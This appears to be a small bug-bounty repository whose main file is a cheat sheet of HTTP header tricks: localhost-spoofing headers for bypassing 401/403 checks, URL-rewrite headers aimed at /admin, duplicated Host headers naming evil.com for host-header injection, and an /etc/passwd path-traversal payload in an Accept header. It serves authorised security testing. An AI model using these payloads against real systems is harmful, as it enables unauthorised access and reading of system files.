├── HTTP-Headers-And-Tricks
└── README.md


/HTTP-Headers-And-Tricks:
--------------------------------------------------------------------------------
 1 | # Add something like 127.0.0.1, localhost, 192.168.1.2, target.com or /admin, /console
 2 | Client-IP:
 3 | Connection:
 4 | Contact:
 5 | Forwarded:
 6 | From:
 7 | Host:
 8 | Origin:
 9 | Referer:
10 | True-Client-IP:
11 | X-Client-IP:
12 | X-Custom-IP-Authorization:
13 | X-Forward-For:
14 | X-Forwarded-For:
15 | X-Forwarded-Host:
16 | X-Forwarded-Server:
17 | X-Host:
18 | X-Original-URL:
19 | X-Originating-IP:
20 | X-Real-IP:
21 | X-Remote-Addr:
22 | X-Remote-IP:
23 | X-Rewrite-URL:
24 | X-Wap-Profile:
25 | 
26 | # Try to repeat same Host header 2 times
27 | Host: legit.com
28 | Stuff: stuff
29 | Host: evil.com
30 | 
31 | # Bypass type limit
32 | Accept: application/json, text/javascript, */*; q=0.01
33 | Accept: ../../../../../../../../../etc/passwd{{'
34 | 
35 | # Try to change the HTTP version from 1.1 to HTTP/0.9 and remove the host header
36 | 
37 | # 401/403 bypasses 
38 | # Whitelisted IP 127.0.0.1 or localhost
39 | Client-IP: 127.0.0.1
40 | Forwarded-For-Ip: 127.0.0.1
41 | Forwarded-For: 127.0.0.1
42 | Forwarded-For: localhost
43 | Forwarded: 127.0.0.1
44 | Forwarded: localhost
45 | True-Client-IP: 127.0.0.1
46 | X-Client-IP: 127.0.0.1
47 | X-Custom-IP-Authorization: 127.0.0.1
48 | X-Forward-For: 127.0.0.1
49 | X-Forward: 127.0.0.1
50 | X-Forward: localhost
51 | X-Forwarded-By: 127.0.0.1
52 | X-Forwarded-By: localhost
53 | X-Forwarded-For-Original: 127.0.0.1
54 | X-Forwarded-For-Original: localhost
55 | X-Forwarded-For: 127.0.0.1
56 | X-Forwarded-For: localhost
57 | X-Forwarded-Server: 127.0.0.1
58 | X-Forwarded-Server: localhost
59 | X-Forwarded: 127.0.0.1
60 | X-Forwarded: localhost
61 | X-Forwared-Host: 127.0.0.1
62 | X-Forwared-Host: localhost
63 | X-Host: 127.0.0.1
64 | X-Host: localhost
65 | X-HTTP-Host-Override: 127.0.0.1
66 | X-Originating-IP: 127.0.0.1
67 | X-Real-IP: 127.0.0.1
68 | X-Remote-Addr: 127.0.0.1
69 | X-Remote-Addr: localhost
70 | X-Remote-IP: 127.0.0.1
71 | 
72 | # Fake Origin - make GET request to accesible endpoint with:
73 | X-Original-URL: /admin
74 | X-Override-URL: /admin
75 | X-Rewrite-URL: /admin
76 | Referer: /admin
77 | # Also try with absoulte url https:/domain.com/admin
78 | 
79 | # Method Override
80 | X-HTTP-Method-Override: PUT
81 | 
82 | # Provide full path GET
83 | GET https://vulnerable-website.com/ HTTP/1.1
84 | Host: evil-website.com
85 | 
86 | # Add line wrapping
87 | GET /index.php HTTP/1.1
88 |  Host: vulnerable-website.com
89 | Host: evil-website.com
90 | 
91 | # Wordlists
92 | https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/BurpSuite-ParamMiner/lowercase-headers
93 | https://github.com/danielmiessler/SecLists/tree/bbb4d86ec1e234b5d3cfa0a4ab3e20c9d5006405/Miscellaneous/web/http-request-headers
94 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # bugbounty stuff
2 | 


--------------------------------------------------------------------------------